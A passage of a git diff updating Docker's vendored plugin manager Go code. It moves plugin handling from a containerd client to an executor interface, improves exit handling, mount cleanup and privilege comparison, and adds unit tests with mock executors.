os.MkdirAll(manager.config.Root, 0700); err != nil { - return nil, errors.Wrapf(err, "failed to mkdir %v", manager.config.Root) - } - if err := os.MkdirAll(manager.config.ExecRoot, 0700); err != nil { - return nil, errors.Wrapf(err, "failed to mkdir %v", manager.config.ExecRoot) - } - if err := os.MkdirAll(manager.tmpDir(), 0700); err != nil { - return nil, errors.Wrapf(err, "failed to mkdir %v", manager.tmpDir()) + for _, dirName := range []string{manager.config.Root, manager.config.ExecRoot, manager.tmpDir()} { + if err := os.MkdirAll(dirName, 0700); err != nil { + return nil, errors.Wrapf(err, "failed to mkdir %v", dirName) + } } var err error - manager.containerdClient, err = config.Executor.Client(manager) // todo: move to another struct + manager.executor, err = config.CreateExecutor(manager) if err != nil { - return nil, errors.Wrap(err, "failed to create containerd client") + return nil, err } + manager.blobStore, err = newBasicBlobStore(filepath.Join(manager.config.Root, "storage/blobs")) if err != nil { return nil, err @@ -112,6 +126,8 @@ func NewManager(config ManagerConfig) (*Manager, error) { if err := manager.reload(); err != nil { return nil, errors.Wrap(err, "failed to restore plugins") } + + manager.publisher = pubsub.NewPublisher(0, 0) return manager, nil } @@ -119,46 +135,50 @@ func (pm *Manager) tmpDir() string { return filepath.Join(pm.config.Root, "tmp") } -// StateChanged updates plugin internals using libcontainerd events. -func (pm *Manager) StateChanged(id string, e libcontainerd.StateInfo) error { - logrus.Debugf("plugin state changed %s %#v", id, e) - - switch e.State { - case libcontainerd.StateExit: - p, err := pm.config.Store.GetV2Plugin(id) - if err != nil { - return err - } - - pm.mu.RLock() - c := pm.cMap[p] - - if c.exitChan != nil { - close(c.exitChan) - } - restart := c.restart - pm.mu.RUnlock() - - os.RemoveAll(filepath.Join(pm.config.ExecRoot, id)) +// HandleExitEvent is called when the executor receives the exit event +// In the future we may change this, but for now all we care about is the exit event. +func (pm *Manager) HandleExitEvent(id string) error { + p, err := pm.config.Store.GetV2Plugin(id) + if err != nil { + return err + } - if p.PropagatedMount != "" { - if err := mount.Unmount(p.PropagatedMount); err != nil { - logrus.Warnf("Could not unmount %s: %v", p.PropagatedMount, err) - } - propRoot := filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount") - if err := mount.Unmount(propRoot); err != nil { - logrus.Warn("Could not unmount %s: %v", propRoot, err) - } - } + if err := os.RemoveAll(filepath.Join(pm.config.ExecRoot, id)); err != nil && !os.IsNotExist(err) { + logrus.WithError(err).WithField("id", id).Error("Could not remove plugin bundle dir") + } - if restart { - pm.enable(p, c, true) + pm.mu.RLock() + c := pm.cMap[p] + if c.exitChan != nil { + close(c.exitChan) + c.exitChan = nil // ignore duplicate events (containerd issue #2299) + } + restart := c.restart + pm.mu.RUnlock() + + if restart { + pm.enable(p, c, true) + } else { + if err := mount.RecursiveUnmount(filepath.Join(pm.config.Root, id)); err != nil { + return errors.Wrap(err, "error cleaning up plugin mounts") } } - return nil } +func handleLoadError(err error, id string) { + if err == nil { + return + } + logger := logrus.WithError(err).WithField("id", id) + if os.IsNotExist(errors.Cause(err)) { + // Likely some error while removing on an older version of docker + logger.Warn("missing plugin config, skipping: this may be caused due to a failed remove and requires manual cleanup.") + return + } + logger.Error("error loading plugin, skipping") +} + func (pm *Manager) reload() error { // todo: restore dir, err := ioutil.ReadDir(pm.config.Root) if err != nil { @@ -169,9 +189,17 @@ func (pm *Manager) reload() error { // todo: restore if validFullID.MatchString(v.Name()) { p, err := pm.loadPlugin(v.Name()) if err != nil { - return err + handleLoadError(err, v.Name()) + continue } plugins[p.GetID()] = p + } else { + if validFullID.MatchString(strings.TrimSuffix(v.Name(), "-removing")) { + // There was likely some error while removing this plugin, let's try to remove again here + if err := system.EnsureRemoveAll(v.Name()); err != nil { + logrus.WithError(err).WithField("id", v.Name()).Warn("error while attempting to clean up previously removed plugin") + } + } } } @@ -180,12 +208,15 @@ func (pm *Manager) reload() error { // todo: restore var wg sync.WaitGroup wg.Add(len(plugins)) for _, p := range plugins { - c := &controller{} // todo: remove this + c := &controller{exitChan: make(chan bool)} + pm.mu.Lock() pm.cMap[p] = c + pm.mu.Unlock() + go func(p *v2.Plugin) { defer wg.Done() - if err := pm.restorePlugin(p); err != nil { - logrus.Errorf("failed to restore plugin '%s': %s", p.Name(), err) + if err := pm.restorePlugin(p, c); err != nil { + logrus.WithError(err).WithField("id", p.GetID()).Error("Failed to restore plugin") return } @@ -202,28 +233,17 @@ func (pm *Manager) reload() error { // todo: restore // check if we need to migrate an older propagated mount from before // these mounts were stored outside the plugin rootfs if _, err := os.Stat(propRoot); os.IsNotExist(err) { - if _, err := os.Stat(p.PropagatedMount); err == nil { - // make sure nothing is mounted here - // don't care about errors - mount.Unmount(p.PropagatedMount) - if err := os.Rename(p.PropagatedMount, propRoot); err != nil { + rootfsProp := filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount) + if _, err := os.Stat(rootfsProp); err == nil { + if err := os.Rename(rootfsProp, propRoot); err != nil { logrus.WithError(err).WithField("dir", propRoot).Error("error migrating propagated mount storage") } - if err := os.MkdirAll(p.PropagatedMount, 0755); err != nil { - logrus.WithError(err).WithField("dir", p.PropagatedMount).Error("error migrating propagated mount storage") - } } } if err := os.MkdirAll(propRoot, 0755); err != nil { logrus.Errorf("failed to create PropagatedMount directory at %s: %v", propRoot, err) } - // TODO: sanitize PropagatedMount and prevent breakout - p.PropagatedMount = filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount) - if err := os.MkdirAll(p.PropagatedMount, 0755); err != nil { - logrus.Errorf("failed to create PropagatedMount directory at %s: %v", p.PropagatedMount, err) - return - } } } } @@ -234,7 +254,7 @@ func (pm *Manager) reload() error { // todo: restore if requiresManualRestore { // if liveRestore is not enabled, the plugin will be stopped now so we should enable it if err := pm.enable(p, c, true); err != nil { - logrus.Errorf("failed to enable plugin '%s': %s", p.Name(), err) + logrus.WithError(err).WithField("id", p.GetID()).Error("failed to enable plugin") } } }(p) @@ -243,6 +263,11 @@ func (pm *Manager) reload() error { // todo: restore return nil } +// Get looks up the requested plugin in the store. +func (pm *Manager) Get(idOrName string) (*v2.Plugin, error) { + return pm.config.Store.GetV2Plugin(idOrName) +} + func (pm *Manager) loadPlugin(id string) (*v2.Plugin, error) { p := filepath.Join(pm.config.Root, id, configFileName) dt, err := ioutil.ReadFile(p) @@ -267,7 +292,7 @@ func (pm *Manager) save(p *v2.Plugin) error { return nil } -// GC cleans up unrefrenced blobs. This is recommended to run in a goroutine +// GC cleans up unreferenced blobs. This is recommended to run in a goroutine func (pm *Manager) GC() { pm.muGC.Lock() defer pm.muGC.Unlock() @@ -294,33 +319,45 @@ func (l logHook) Fire(entry *logrus.Entry) error { return nil } -func attachToLog(id string) func(libcontainerd.IOPipe) error { - return func(iop libcontainerd.IOPipe) error { - iop.Stdin.Close() - - logger := logrus.New() - logger.Hooks.Add(logHook{id}) - // TODO: cache writer per id - w := logger.Writer() - go func() { - io.Copy(w, iop.Stdout) - }() - go func() { - // TODO: update logrus and use logger.WriterLevel - io.Copy(w, iop.Stderr) - }() - return nil - } +func makeLoggerStreams(id string) (stdout, stderr io.WriteCloser) { + logger := logrus.New() + logger.Hooks.Add(logHook{id}) + return logger.WriterLevel(logrus.InfoLevel), logger.WriterLevel(logrus.ErrorLevel) } func validatePrivileges(requiredPrivileges, privileges types.PluginPrivileges) error { - // todo: make a better function that doesn't check order - if !reflect.DeepEqual(privileges, requiredPrivileges) { + if !isEqual(requiredPrivileges, privileges, isEqualPrivilege) { return errors.New("incorrect privileges") } + return nil } +func isEqual(arrOne, arrOther types.PluginPrivileges, compare func(x, y types.PluginPrivilege) bool) bool { + if len(arrOne) != len(arrOther) { + return false + } + + sort.Sort(arrOne) + sort.Sort(arrOther) + + for i := 1; i < arrOne.Len(); i++ { + if !compare(arrOne[i], arrOther[i]) { + return false + } + } + + return true +} + +func isEqualPrivilege(a, b types.PluginPrivilege) bool { + if a.Name != b.Name { + return false + } + + return reflect.DeepEqual(a.Value, b.Value) +} + func configToRootFS(c []byte) (*image.RootFS, error) { var pluginConfig types.PluginConfig if err := json.Unmarshal(c, &pluginConfig); err != nil { diff --git a/vendor/github.com/docker/docker/plugin/manager_linux.go b/vendor/github.com/docker/docker/plugin/manager_linux.go index ad66616628..3c6f9c553a 100644 --- a/vendor/github.com/docker/docker/plugin/manager_linux.go +++ b/vendor/github.com/docker/docker/plugin/manager_linux.go @@ -1,32 +1,31 @@ -// +build linux - -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( "encoding/json" - "fmt" + "net" "os" "path/filepath" - "syscall" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" "github.com/docker/docker/api/types" "github.com/docker/docker/daemon/initlayer" - "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/plugin/v2" - specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/go-digest" "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { p.Rootfs = filepath.Join(pm.config.Root, p.PluginObj.ID, "rootfs") if p.IsEnabled() && !force { - return fmt.Errorf("plugin %s is already enabled", p.Name()) + return errors.Wrap(enabledError(p.Name()), "plugin already enabled") } spec, err := p.InitSpec(pm.config.ExecRoot) if err != nil { @@ -41,7 +40,7 @@ func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { pm.mu.Unlock() var propRoot string - if p.PropagatedMount != "" { + if p.PluginObj.Config.PropagatedMount != "" { propRoot = filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount") if err := os.MkdirAll(propRoot, 0755); err != nil { @@ -51,55 +50,82 @@ func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { if err := mount.MakeRShared(propRoot); err != nil { return errors.Wrap(err, "error setting up propagated mount dir") } - - if err := mount.Mount(propRoot, p.PropagatedMount, "none", "rbind"); err != nil { - return errors.Wrap(err, "error creating mount for propagated mount") - } } - if err := initlayer.Setup(filepath.Join(pm.config.Root, p.PluginObj.ID, rootFSFileName), 0, 0); err != nil { + rootFS := containerfs.NewLocalContainerFS(filepath.Join(pm.config.Root, p.PluginObj.ID, rootFSFileName)) + if err := initlayer.Setup(rootFS, idtools.IDPair{UID: 0, GID: 0}); err != nil { return errors.WithStack(err) } - if err := pm.containerdClient.Create(p.GetID(), "", "", specs.Spec(*spec), attachToLog(p.GetID())); err != nil { - if p.PropagatedMount != "" { - if err := mount.Unmount(p.PropagatedMount); err != nil { - logrus.Warnf("Could not unmount %s: %v", p.PropagatedMount, err) - } + stdout, stderr := makeLoggerStreams(p.GetID()) + if err := pm.executor.Create(p.GetID(), *spec, stdout, stderr); err != nil { + if p.PluginObj.Config.PropagatedMount != "" { if err := mount.Unmount(propRoot); err != nil { logrus.Warnf("Could not unmount %s: %v", propRoot, err) } } return errors.WithStack(err) } - return pm.pluginPostStart(p, c) } func (pm *Manager) pluginPostStart(p *v2.Plugin, c *controller) error { - client, err := plugins.NewClientWithTimeout("unix://"+filepath.Join(pm.config.ExecRoot, p.GetID(), p.GetSocket()), nil, c.timeoutInSecs) - if err != nil { - c.restart = false - shutdownPlugin(p, c, pm.containerdClient) - return errors.WithStack(err) + sockAddr := filepath.Join(pm.config.ExecRoot, p.GetID(), p.GetSocket()) + p.SetTimeout(time.Duration(c.timeoutInSecs) * time.Second) + addr := &net.UnixAddr{Net: "unix", Name: sockAddr} + p.SetAddr(addr) + + if p.Protocol() == plugins.ProtocolSchemeHTTPV1 { + client, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, p.Timeout()) + if err != nil { + c.restart = false + shutdownPlugin(p, c.exitChan, pm.executor) + return errors.WithStack(err) + } + + p.SetPClient(client) } - p.SetPClient(client) + // Initial sleep before net Dial to allow plugin to listen on socket. + time.Sleep(500 * time.Millisecond) + maxRetries := 3 + var retries int + for { + // net dial into the unix socket to see if someone's listening. + conn, err := net.Dial("unix", sockAddr) + if err == nil { + conn.Close() + break + } + + time.Sleep(3 * time.Second) + retries++ + + if retries > maxRetries { + logrus.Debugf("error net dialing plugin: %v", err) + c.restart = false + // While restoring plugins, we need to explicitly set the state to disabled + pm.config.Store.SetState(p, false) + shutdownPlugin(p, c.exitChan, pm.executor) + return err + } + + } pm.config.Store.SetState(p, true) pm.config.Store.CallHandler(p) return pm.save(p) } -func (pm *Manager) restore(p *v2.Plugin) error { - if err := pm.containerdClient.Restore(p.GetID(), attachToLog(p.GetID())); err != nil { +func (pm *Manager) restore(p *v2.Plugin, c *controller) error { + stdout, stderr := makeLoggerStreams(p.GetID()) + alive, err := pm.executor.Restore(p.GetID(), stdout, stderr) + if err != nil { return err } if pm.config.LiveRestoreEnabled { - c := &controller{} - if pids, _ := pm.containerdClient.GetPidsForContainer(p.GetID()); len(pids) == 0 { - // plugin is not running, so follow normal startup procedure + if !alive { return pm.enable(p, c, true) } @@ -111,35 +137,47 @@ func (pm *Manager) restore(p *v2.Plugin) error { return pm.pluginPostStart(p, c) } + if alive { + // TODO(@cpuguy83): Should we always just re-attach to the running plugin instead of doing this? + c.restart = false + shutdownPlugin(p, c.exitChan, pm.executor) + } + return nil } -func shutdownPlugin(p *v2.Plugin, c *controller, containerdClient libcontainerd.Client) { +func shutdownPlugin(p *v2.Plugin, ec chan bool, executor Executor) { pluginID := p.GetID() - err := containerdClient.Signal(pluginID, int(syscall.SIGTERM)) + err := executor.Signal(pluginID, int(unix.SIGTERM)) if err != nil { logrus.Errorf("Sending SIGTERM to plugin failed with error: %v", err) } else { select { - case <-c.exitChan: + case <-ec: logrus.Debug("Clean shutdown of plugin") case <-time.After(time.Second * 10): logrus.Debug("Force shutdown plugin") - if err := containerdClient.Signal(pluginID, int(syscall.SIGKILL)); err != nil { + if err := executor.Signal(pluginID, int(unix.SIGKILL)); err != nil { logrus.Errorf("Sending SIGKILL to plugin failed with error: %v", err) } + select { + case <-ec: + logrus.Debug("SIGKILL plugin shutdown") + case <-time.After(time.Second * 10): + logrus.Debug("Force shutdown plugin FAILED") + } } } } func (pm *Manager) disable(p *v2.Plugin, c *controller) error { if !p.IsEnabled() { - return fmt.Errorf("plugin %s is already disabled", p.Name()) + return errors.Wrap(errDisabled(p.Name()), "plugin is already disabled") } c.restart = false - shutdownPlugin(p, c, pm.containerdClient) + shutdownPlugin(p, c.exitChan, pm.executor) pm.config.Store.SetState(p, false) return pm.save(p) } @@ -156,11 +194,14 @@ func (pm *Manager) Shutdown() { logrus.Debug("Plugin active when liveRestore is set, skipping shutdown") continue } - if pm.containerdClient != nil && p.IsEnabled() { + if pm.executor != nil && p.IsEnabled() { c.restart = false - shutdownPlugin(p, c, pm.containerdClient) + shutdownPlugin(p, c.exitChan, pm.executor) } } + if err := mount.RecursiveUnmount(pm.config.Root); err != nil { + logrus.WithError(err).Warn("error cleaning up plugin mounts") + } } func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobsums []digest.Digest, tmpRootFSDir string, privileges *types.PluginPrivileges) (err error) { @@ -171,9 +212,17 @@ func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobs pdir := filepath.Join(pm.config.Root, p.PluginObj.ID) orig := filepath.Join(pdir, "rootfs") + + // Make sure nothing is mounted + // This could happen if the plugin was disabled with `-f` with active mounts. + // If there is anything in `orig` is still mounted, this should error out. + if err := mount.RecursiveUnmount(orig); err != nil { + return errdefs.System(err) + } + backup := orig + "-old" if err := os.Rename(orig, backup); err != nil { - return err + return errors.Wrap(errdefs.System(err), "error backing up plugin data before upgrade") } defer func() { @@ -182,9 +231,8 @@ func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobs logrus.WithError(rmErr).WithField("dir", backup).Error("error cleaning up after failed upgrade") return } - - if err := os.Rename(backup, orig); err != nil { - err = errors.Wrap(err, "error restoring old plugin root on upgrade failure") + if mvErr := os.Rename(backup, orig); mvErr != nil { + err = errors.Wrap(mvErr, "error restoring old plugin root on upgrade failure") } if rmErr := os.RemoveAll(tmpRootFSDir); rmErr != nil && !os.IsNotExist(rmErr) { logrus.WithError(rmErr).WithField("plugin", p.Name()).Errorf("error cleaning up plugin upgrade dir: %s", tmpRootFSDir) @@ -200,7 +248,7 @@ func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobs }() if err := os.Rename(tmpRootFSDir, orig); err != nil { - return errors.Wrap(err, "error upgrading") + return errors.Wrap(errdefs.System(err), "error upgrading") } p.PluginObj.Config = config @@ -224,7 +272,7 @@ func (pm *Manager) setupNewPlugin(configDigest digest.Digest, blobsums []digest. return types.PluginConfig{}, errors.New("invalid config json") } - requiredPrivileges, err := computePrivileges(config) + requiredPrivileges := computePrivileges(config) if err != nil { return types.PluginConfig{}, err } @@ -238,9 +286,9 @@ func (pm *Manager) setupNewPlugin(configDigest digest.Digest, blobsums []digest. } // createPlugin creates a new plugin. take lock before calling. -func (pm *Manager) createPlugin(name string, configDigest digest.Digest, blobsums []digest.Digest, rootFSDir string, privileges *types.PluginPrivileges) (p *v2.Plugin, err error) { +func (pm *Manager) createPlugin(name string, configDigest digest.Digest, blobsums []digest.Digest, rootFSDir string, privileges *types.PluginPrivileges, opts ...CreateOpt) (p *v2.Plugin, err error) { if err := pm.config.Store.validateName(name); err != nil { // todo: this check is wrong. remove store - return nil, err + return nil, errdefs.InvalidParameter(err) } config, err := pm.setupNewPlugin(configDigest, blobsums, privileges) @@ -258,6 +306,9 @@ func (pm *Manager) createPlugin(name string, configDigest digest.Digest, blobsum Blobsums: blobsums, } p.InitEmptySettings() + for _, o := range opts { + o(p) + } pdir := filepath.Join(pm.config.Root, p.PluginObj.ID) if err := os.MkdirAll(pdir, 0700); err != nil { diff --git a/vendor/github.com/docker/docker/plugin/manager_linux_test.go b/vendor/github.com/docker/docker/plugin/manager_linux_test.go new file mode 100644 index 0000000000..fd8fa8523c --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/manager_linux_test.go @@ -0,0 +1,279 @@ +package plugin // import "github.com/docker/docker/plugin" + +import ( + "io" + "io/ioutil" + "net" + "os" + "path/filepath" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/plugin/v2" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "gotest.tools/skip" +) + +func TestManagerWithPluginMounts(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + root, err := ioutil.TempDir("", "test-store-with-plugin-mounts") + if err != nil { + t.Fatal(err) + } + defer system.EnsureRemoveAll(root) + + s := NewStore() + managerRoot := filepath.Join(root, "manager") + p1 := newTestPlugin(t, "test1", "testcap", managerRoot) + + p2 := newTestPlugin(t, "test2", "testcap", managerRoot) + p2.PluginObj.Enabled = true + + m, err := NewManager( + ManagerConfig{ + Store: s, + Root: managerRoot, + ExecRoot: filepath.Join(root, "exec"), + CreateExecutor: func(*Manager) (Executor, error) { return nil, nil }, + LogPluginEvent: func(_, _, _ string) {}, + }) + if err != nil { + t.Fatal(err) + } + + if err := s.Add(p1); err != nil { + t.Fatal(err) + } + if err := s.Add(p2); err != nil { + t.Fatal(err) + } + + // Create a mount to simulate a plugin that has created it's own mounts + p2Mount := filepath.Join(p2.Rootfs, "testmount") + if err := os.MkdirAll(p2Mount, 0755); err != nil { + t.Fatal(err) + } + if err := mount.Mount("tmpfs", p2Mount, "tmpfs", ""); err != nil { + t.Fatal(err) + } + + if err := m.Remove(p1.GetID(), &types.PluginRmConfig{ForceRemove: true}); err != nil { + t.Fatal(err) + } + if mounted, err := mount.Mounted(p2Mount); !mounted || err != nil { + t.Fatalf("expected %s to be mounted, err: %v", p2Mount, err) + } +} + +func newTestPlugin(t *testing.T, name, cap, root string) *v2.Plugin { + id := stringid.GenerateNonCryptoID() + rootfs := filepath.Join(root, id) + if err := os.MkdirAll(rootfs, 0755); err != nil { + t.Fatal(err) + } + + p := v2.Plugin{PluginObj: types.Plugin{ID: id, Name: name}} + p.Rootfs = rootfs + iType := types.PluginInterfaceType{Capability: cap, Prefix: "docker", Version: "1.0"} + i := types.PluginConfigInterface{Socket: "plugin.sock", Types: []types.PluginInterfaceType{iType}} + p.PluginObj.Config.Interface = i + p.PluginObj.ID = id + + return &p +} + +type simpleExecutor struct { +} + +func (e *simpleExecutor) Create(id string, spec specs.Spec, stdout, stderr io.WriteCloser) error { + return errors.New("Create failed") +} + +func (e *simpleExecutor) Restore(id string, stdout, stderr io.WriteCloser) (bool, error) { + return false, nil +} + +func (e *simpleExecutor) IsRunning(id string) (bool, error) { + return false, nil +} + +func (e *simpleExecutor) Signal(id string, signal int) error { + return nil +} + +func TestCreateFailed(t *testing.T) { + root, err := ioutil.TempDir("", "test-create-failed") + if err != nil { + t.Fatal(err) + } + defer system.EnsureRemoveAll(root) + + s := NewStore() + managerRoot := filepath.Join(root, "manager") + p := newTestPlugin(t, "create", "testcreate", managerRoot) + + m, err := NewManager( + ManagerConfig{ + Store: s, + Root: managerRoot, + ExecRoot: filepath.Join(root, "exec"), + CreateExecutor: func(*Manager) (Executor, error) { return &simpleExecutor{}, nil }, + LogPluginEvent: func(_, _, _ string) {}, + }) + if err != nil { + t.Fatal(err) + } + + if err := s.Add(p); err != nil { + t.Fatal(err) + } + + if err := m.enable(p, &controller{}, false); err == nil { + t.Fatalf("expected Create failed error, got %v", err) + } + + if err := m.Remove(p.GetID(), &types.PluginRmConfig{ForceRemove: true}); err != nil { + t.Fatal(err) + } +} + +type executorWithRunning struct { + m *Manager + root string + exitChans map[string]chan struct{} +} + +func (e *executorWithRunning) Create(id string, spec specs.Spec, stdout, stderr io.WriteCloser) error { + sockAddr := filepath.Join(e.root, id, "plugin.sock") + ch := make(chan struct{}) + if e.exitChans == nil { + e.exitChans = make(map[string]chan struct{}) + } + e.exitChans[id] = ch + listenTestPlugin(sockAddr, ch) + return nil +} + +func (e *executorWithRunning) IsRunning(id string) (bool, error) { + return true, nil +} +func (e *executorWithRunning) Restore(id string, stdout, stderr io.WriteCloser) (bool, error) { + return true, nil +} + +func (e *executorWithRunning) Signal(id string, signal int) error { + ch := e.exitChans[id] + ch <- struct{}{} + <-ch + e.m.HandleExitEvent(id) + return nil +} + +func TestPluginAlreadyRunningOnStartup(t *testing.T) { + t.Parallel() + + root, err := ioutil.TempDir("", t.Name()) + if err != nil { + t.Fatal(err) + } + defer system.EnsureRemoveAll(root) + + for _, test := range []struct { + desc string + config ManagerConfig + }{ + { + desc: "live-restore-disabled", + config: ManagerConfig{ + LogPluginEvent: func(_, _, _ string) {}, + }, + }, + { + desc: "live-restore-enabled", + config: ManagerConfig{ + LogPluginEvent: func(_, _, _ string) {}, + LiveRestoreEnabled: true, + }, + }, + } { + t.Run(test.desc, func(t *testing.T) { + config := test.config + desc := test.desc + t.Parallel() + + p := newTestPlugin(t, desc, desc, config.Root) + p.PluginObj.Enabled = true + + // Need a short-ish path here so we don't run into unix socket path length issues. + config.ExecRoot, err = ioutil.TempDir("", "plugintest") + + executor := &executorWithRunning{root: config.ExecRoot} + config.CreateExecutor = func(m *Manager) (Executor, error) { executor.m = m; return executor, nil } + + if err := executor.Create(p.GetID(), specs.Spec{}, nil, nil); err != nil { + t.Fatal(err) + } + + root := filepath.Join(root, desc) + config.Root = filepath.Join(root, "manager") + if err := os.MkdirAll(filepath.Join(config.Root, p.GetID()), 0755); err != nil { + t.Fatal(err) + } + + if !p.IsEnabled() { + t.Fatal("plugin should be enabled") + } + if err := (&Manager{config: config}).save(p); err != nil { + t.Fatal(err) + } + + s := NewStore() + config.Store = s + if err != nil { + t.Fatal(err) + } + defer system.EnsureRemoveAll(config.ExecRoot) + + m, err := NewManager(config) + if err != nil { + t.Fatal(err) + } + defer m.Shutdown() + + p = s.GetAll()[p.GetID()] // refresh `p` with what the manager knows + if p.Client() == nil { + t.Fatal("plugin client should not be nil") + } + }) + } +} + +func listenTestPlugin(sockAddr string, exit chan struct{}) (net.Listener, error) { + if err := os.MkdirAll(filepath.Dir(sockAddr), 0755); err != nil { + return nil, err + } + l, err := net.Listen("unix", sockAddr) + if err != nil { + return nil, err + } + go func() { + for { + conn, err := l.Accept() + if err != nil { + return + } + conn.Close() + } + }() + go func() { + <-exit + l.Close() + os.Remove(sockAddr) + exit <- struct{}{} + }() + return l, nil +} diff --git a/vendor/github.com/docker/docker/plugin/manager_solaris.go b/vendor/github.com/docker/docker/plugin/manager_solaris.go deleted file mode 100644 index 72ccae72d3..0000000000 --- a/vendor/github.com/docker/docker/plugin/manager_solaris.go +++ /dev/null @@ -1,28 +0,0 @@ -package plugin - -import ( - "fmt" - - "github.com/docker/docker/plugin/v2" - specs "github.com/opencontainers/runtime-spec/specs-go" -) - -func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { - return fmt.Errorf("Not implemented") -} - -func (pm *Manager) initSpec(p *v2.Plugin) (*specs.Spec, error) { - return nil, fmt.Errorf("Not implemented") -} - -func (pm *Manager) disable(p *v2.Plugin, c *controller) error { - return fmt.Errorf("Not implemented") -} - -func (pm *Manager) restore(p *v2.Plugin) error { - return fmt.Errorf("Not implemented") -} - -// Shutdown plugins -func (pm *Manager) Shutdown() { -} diff --git a/vendor/github.com/docker/docker/plugin/manager_test.go b/vendor/github.com/docker/docker/plugin/manager_test.go new file mode 100644 index 0000000000..62ccf2149d --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/manager_test.go @@ -0,0 +1,55 @@ +package plugin // import "github.com/docker/docker/plugin" + +import ( + "testing" + + "github.com/docker/docker/api/types" +) + +func TestValidatePrivileges(t *testing.T) { + testData := map[string]struct { + requiredPrivileges types.PluginPrivileges + privileges types.PluginPrivileges + result bool + }{ + "diff-len": { + requiredPrivileges: []types.PluginPrivilege{ + {Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "ghi"}}, + }, + privileges: []types.PluginPrivilege{ + {Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "ghi"}}, + {Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "789"}}, + }, + result: false, + }, + "diff-value": { + requiredPrivileges: []types.PluginPrivilege{ + {Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "GHI"}}, + {Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "***"}}, + }, + privileges: []types.PluginPrivilege{ + {Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "ghi"}}, + {Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "789"}}, + }, + result: false, + }, + "diff-order-but-same-value": { + requiredPrivileges: []types.PluginPrivilege{ + {Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "GHI"}}, + {Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "789"}}, + }, + privileges: []types.PluginPrivilege{ + {Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "789"}}, + {Name: "Privilege1", Description: "Description", Value: []string{"GHI", "abc", "def"}}, + }, + result: true, + }, + } + + for key, data := range testData { + err := validatePrivileges(data.requiredPrivileges, data.privileges) + if (err == nil) != data.result { + t.Fatalf("Test item %s expected result to be %t, got %t", key, data.result, (err == nil)) + } + } +} diff --git a/vendor/github.com/docker/docker/plugin/manager_windows.go b/vendor/github.com/docker/docker/plugin/manager_windows.go index 4469a671f7..90cc52c992 100644 --- a/vendor/github.com/docker/docker/plugin/manager_windows.go +++ b/vendor/github.com/docker/docker/plugin/manager_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( "fmt" @@ -21,7 +19,7 @@ func (pm *Manager) disable(p *v2.Plugin, c *controller) error { return fmt.Errorf("Not implemented") } -func (pm *Manager) restore(p *v2.Plugin) error { +func (pm *Manager) restore(p *v2.Plugin, c *controller) error { return fmt.Errorf("Not implemented") } diff --git a/vendor/github.com/docker/docker/plugin/store.go b/vendor/github.com/docker/docker/plugin/store.go index b7a96a950a..8e96c11da4 100644 --- a/vendor/github.com/docker/docker/plugin/store.go +++ b/vendor/github.com/docker/docker/plugin/store.go @@ -1,42 +1,32 @@ -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( "fmt" "strings" - "github.com/Sirupsen/logrus" + "github.com/docker/distribution/reference" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/plugingetter" "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/plugin/v2" - "github.com/docker/docker/reference" + "github.com/opencontainers/runtime-spec/specs-go" "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) /* allowV1PluginsFallback determines daemon's support for V1 plugins. * When the time comes to remove support for V1 plugins, flipping * this bool is all that will be needed. */ -const allowV1PluginsFallback bool = true +const allowV1PluginsFallback = true /* defaultAPIVersion is the version of the plugin API for volume, network, IPAM and authz. This is a very stable API. When we update this API, then - pluginType should include a version. eg "networkdriver/2.0". + pluginType should include a version. e.g. "networkdriver/2.0". */ -const defaultAPIVersion string = "1.0" +const defaultAPIVersion = "1.0" -// ErrNotFound indicates that a plugin was not found locally. -type ErrNotFound string - -func (name ErrNotFound) Error() string { return fmt.Sprintf("plugin %q not found", string(name)) } - -// ErrAmbiguous indicates that a plugin was not found locally. -type ErrAmbiguous string - -func (name ErrAmbiguous) Error() string { - return fmt.Sprintf("multiple plugins found for %q", string(name)) -} - -// GetV2Plugin retreives a plugin by name, id or partial ID. +// GetV2Plugin retrieves a plugin by name, id or partial ID. func (ps *Store) GetV2Plugin(refOrID string) (*v2.Plugin, error) { 